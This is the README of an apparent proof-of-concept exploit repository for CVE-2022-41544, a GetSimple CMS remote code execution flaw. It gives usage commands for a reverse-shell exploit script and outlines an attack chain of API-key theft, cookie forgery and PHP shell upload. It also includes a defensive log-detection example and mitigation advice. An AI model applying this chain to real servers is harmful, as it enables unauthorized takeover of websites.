Introduction
# CVE-2022-41544 - GetSimple CMS RCE Exploit
## Overview
This repository contains a proof-of-concept exploit for **CVE-2022-41544**, a critical Remote Code Execution (RCE) vulnerability affecting GetSimple CMS version 3.3.16 and earlier.
## Vulnerability Details
- **CVE ID**: CVE-2022-41544
- **Vendor**: GetSimple CMS
- **Affected Versions**: ≤ 3.3.16
- **Vulnerability Type**: Remote Code Execution (RCE)
- **CVSS Score**: Critical (9.8)
- **Exploit POC Revision Date**: August 24, 2025
## Description
The vulnerability allows authenticated attackers to upload and execute arbitrary PHP code through the theme editor functionality, leading to remote code execution on the target system.
## Requirements
- Python 3.6+
- Network access to target GetSimple CMS installation
- Valid admin username for the target CMS
## Installation
1. Clone this repository:
```bash
git clone https://github.com/nopgadget/CVE-2022-41544
cd CVE-2022-41544
```
2. Ready to use - no additional dependencies required
## Usage
### Basic Usage
```bash
python3 exploit.py <target> <path> <ip:port> <username>
```
### With Interactive Shell
```bash
python3 exploit.py <target> <path> <ip:port> <username> --shell
```
### Parameters
- **`<target>`**: Target hostname or IP address
- **`<path>`**: Web path to GetSimple CMS installation (e.g., `/` or `/cms/`)
- **`<ip:port>`**: Your listener IP and port for reverse shell (e.g., `192.168.1.100:4444`)
- **`<username>`**: Admin username for the target CMS
- **`--shell`**: Optional flag to launch interactive telnet shell after exploit
### Example
```bash
python3 exploit.py example.com /cms/ 192.168.1.100:4444 admin --shell
```
## How It Works
1. **Version Detection**: Checks if the target CMS version is vulnerable
2. **API Key Extraction**: Retrieves the API key from the authorization.xml file
3. **Authentication Bypass**: Forges authentication cookies using the extracted API key
4. **CSRF Token Retrieval**: Obtains CSRF token from the theme editor
5. **Shell Upload**: Uploads a PHP reverse shell through the theme editor
6. **Shell Execution**: Triggers the uploaded shell to establish reverse connection
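From the defender's side, the six steps above leave a recognisable trail in web-server access logs. The following detector is an added example, not code from this repository: it replays the chain (read of the API key file, POST to the theme editor, request for a new `.php` under the theme directory) per client IP over constructed log lines. The paths `data/other/authorization.xml`, `admin/theme-edit.php` and `theme/<name>/` are assumed from a default GetSimple layout, not taken from the README.

```python
import re
from collections import defaultdict
# Common/combined access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# The chain from "How It Works", in order. The paths assume a default GetSimple
# layout (data/other/, admin/, theme/); that layout is an assumption of this example.
STAGES = (
    ("apikey_read",     "GET",  re.compile(r"/data/other/authorization\.xml$")),
    ("theme_edit_post", "POST", re.compile(r"/admin/theme-edit\.php$")),
    ("theme_php_hit",   "GET",  re.compile(r"/theme/.+\.php$")),
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # query string is irrelevant here
    rec["status"] = int(rec["status"])
    return rec

def detect_chain(log_text):
    """Map each client IP to the ordered chain stages it completed.
    Only answered requests (status < 400) advance a client, so a 403 on
    authorization.xml (the file blocked, as it should be) does not count.
    Stage 1 alone means the key file is exposed; stage 3 is a probable compromise.
    """
    reached = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] >= 400:
            continue
        done = reached[rec["ip"]]
        if len(done) < len(STAGES):
            name, method, pattern = STAGES[len(done)]
            if rec["method"] == method and pattern.search(rec["path"]):
                done.append(name)
    return {ip: stages for ip, stages in reached.items() if stages}

# Constructed sample: one client walks the whole chain, one is blocked at stage 1.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Aug/2025:10:00:02 +0000] "GET /cms/data/other/authorization.xml HTTP/1.1" 200 512
203.0.113.7 - - [24/Aug/2025:10:00:04 +0000] "POST /cms/admin/theme-edit.php HTTP/1.1" 302 0
203.0.113.7 - - [24/Aug/2025:10:00:05 +0000] "GET /cms/theme/Innovation/new.php HTTP/1.1" 200 0
198.51.100.4 - - [24/Aug/2025:10:01:00 +0000] "GET /cms/data/other/authorization.xml HTTP/1.1" 403 199
198.51.100.4 - - [24/Aug/2025:10:01:10 +0000] "GET /cms/index.php HTTP/1.1" 200 4096
"""
```

A client that never gets past stage 1 still tells you the key file is readable and should be blocked at the web server, which also breaks step 2 of the chain.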
## Security Notice
⚠️ **WARNING**: This tool is for **EDUCATIONAL PURPOSES ONLY**.
- Only use on systems you own or have explicit permission to test
- Unauthorized testing is illegal and unethical
- The authors are not responsible for any misuse of this tool
- Always follow responsible disclosure practices
## Mitigation
To protect against this vulnerability:
1. **Update GetSimple CMS** to version 3.3.17 or later
2. **Apply security patches** as soon as they become available
3. **Restrict access** to admin panels
4. **Use WAF rules** to block suspicious file uploads
5. **Monitor file uploads** for malicious content
## Testing Environment
- **OS**: Linux (tested on Ubuntu)
- **Python**: 3.6+
- **Target**: GetSimple CMS ≤ 3.3.16
## Disclaimer
This exploit is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors disclaim any liability for misuse of this tool.
## License
This project is for educational purposes only. Use responsibly and ethically.
File snapshot
```
[4.0K] /data/pocs/f2dfc7898153a2d245bfccbbcdc6aaaaa057ddf9
├── [6.4K] exploit.py
└── [3.2K] README.md
0 directories, 2 files
```